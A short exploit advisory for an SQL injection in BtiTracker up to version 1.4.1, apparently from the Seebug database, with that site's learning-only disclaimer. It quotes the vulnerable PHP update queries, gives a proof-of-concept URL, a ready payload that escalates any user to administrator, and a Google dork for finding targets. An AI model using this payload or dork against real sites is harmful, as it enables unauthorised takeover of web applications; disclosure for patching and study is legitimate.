################################################################################# # # BtiTracker <=v1.4.1 Remote SQL Injection Exploit # # Discovered by: m@ge|ozz - babbano@gmail.com # Vulnerabitity: Remote Sql Injection / # Problem: Any user can be Administrator # Website Vendor: http://www.btiteam.org # # Vulnerable Code (account_change.php): # # if (isset($_GET["style"])) # @mysql_query("UPDATE users SET style=$style WHERE id=".$CURUSER["uid"]); # # if (isset($_GET["langue"])) # @mysql_query("UPDATE users SET language=$langue WHERE id=".$CURUSER["uid"]); # # PoC: account_change.php?style=2[SQL]&returnto=%2F # # Example to gain admin control: account_change.php?style=1,id_level=8 # # # GoogleDork: "by Btiteam" # # Shoutz: - eVolVe or Die - # #################################################################################
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论